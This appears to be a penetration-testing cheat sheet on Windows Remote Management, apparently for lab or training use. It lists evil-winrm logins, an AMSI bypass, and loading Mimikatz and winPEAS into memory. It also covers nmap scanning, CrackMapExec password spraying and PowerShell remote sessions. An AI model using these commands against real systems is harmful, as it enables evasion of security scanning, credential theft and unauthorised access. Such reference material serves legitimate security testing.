WinRM
ABOUT
Windows Remote Management (WinRM) is a simple Windows integrated remote management protocol based on the command line. WinRM uses the Simple Object Access Protocol (SOAP) to establish connections to remote hosts and their applications. WinRM relies on TCP ports 5985
and 5986
for communication, with the last port 5986
using HTTPS. Services like remote sessions using PowerShell and event log merging require WinRM.
Evil-WinRM
evil-winrm -i 13.13.13.13 -u venator17 -p password123
use
menu
to see evil-winrm's commands and loaded scripts
Before loading any script or executable we will need to bypass Antimalware Scan Interface (AMSI). We can do it by using
Bypass-4MSI
command, which patches it.
Load Scripts
evil-winrm -i 13.13.13.13 -u venator17 -p password123 -s /opt/scripts/powershell # -s is location of scripts
Bypass-4MSI # Bypassing AMSI
Invoke-Mimikatz.ps1 # Loading it into memoryu
Invoke-Mimikatz # Executing
Loading Executables
evil-winrm -i 13.13.13.13 -u venator17 -p password123 -e /opt/executables # -e is location of executables
Invoke-Binary /opt/executables/winPEAS.exe
Loading Files
You can upload files only from directory you executed evil-winrm
upload /opt/executables/winPEAS.exe
./winPEAS.exe
Nmap WinRM
nmap -sV -sC 13.13.13.13 -p5985,5986 --disable-arp-ping -n
CrackMapExec
crackmapexec winrm 13.13.13.13 -u user.list -p password
PowerShell
PS C:\> $password = ConvertTo-SecureString "password123" -AsPlainText -Force
PS C:\> $cred = new-object System.Management.Automation.PSCredential ("MILITECH\sreed", $password)
PS C:\> Enter-PSSession -ComputerName MILITECH-MS13 -Credential $cred
RESOURCES
Last updated